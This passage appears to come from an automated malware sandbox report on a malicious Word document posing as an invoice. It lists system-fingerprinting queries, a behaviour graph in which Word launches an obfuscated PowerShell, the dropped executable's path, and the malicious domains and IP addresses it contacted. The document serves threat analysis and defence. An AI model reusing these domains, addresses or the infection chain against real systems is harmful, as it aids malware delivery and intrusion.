Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\Public\276299.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PartitionClu.exeQueries volume information: C:\ VolumeInformation
Contains functionality to query windows versionShow sources
Source: C:\Users\Public\276299.exeCode function: 6_2_00428E60 RtlGetVersion,GetNativeSystemInfo,6_2_00428E60
Queries the cryptographic machine GUIDShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 62468 Sample: INVOICE-ZZIF-145448203429222.doc Startdate: 04/06/2018 Architecture: WINDOWS Score: 100 44 Multi AV Scanner detection for domain / URL 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Obfuscated command line found 2->48 50 10 other signatures 2->50 9 WINWORD.EXE 305 20 2->9         started        12 PartitionClu.exe 2->12         started        14 OSPPSVC.EXE 2->14         started        process3 signatures4 68 Obfuscated command line found 9->68 70 Very long command line found 9->70 72 Document exploit detected (process start blacklist hit) 9->72 16 cmd.exe 9->16         started        74 Drops executables to the windows directory (C:\Windows) and starts them 12->74 19 PartitionClu.exe 12->19         started        process5 dnsIp6 52 Very long command line found 16->52 22 powershell.exe 16->22         started        34 149.202.153.252, 4143, 49172 OVHFR France 19->34 36 178.32.255.132, 49174, 8080 OVHFR France 19->36 38 3 other IPs or domains 19->38 signatures7 54 Detected TCP or UDP traffic on non-standard ports 36->54 process8 dnsIp9 40 executivevacation.us 66.198.240.37, 49171, 80 A2HOSTING-A2HostingIncUS United States 22->40 42 clients.steadfast.digital 22->42 32 C:\Users\Public\276299.exe, PE32 22->32 dropped 60 System process connects to network (likely due to code injection or exploit) 22->60 62 Drops PE files to the user root directory 22->62 64 Powershell connects to network 22->64 66 Powershell drops PE file 22->66 27 276299.exe 22->27         started        file10 signatures11 process12 signatures13 56 Antivirus detection for dropped file 27->56 58 Multi AV Scanner detection for dropped file 27->58 30 276299.exe 27->30         started        process14

Simulations

Behavior and APIs

TimeTypeDescription
12:29:26API Interceptor5x Sleep call for process: WINWORD.EXE modified
12:29:29API Interceptor3x Sleep call for process: OSPPSVC.EXE modified
12:29:30API Interceptor1x Sleep call for process: powershell.exe modified
12:29:35API Interceptor3x Sleep call for process: 276299.exe modified
12:29:38API Interceptor3x Sleep call for process: PartitionClu.exe modified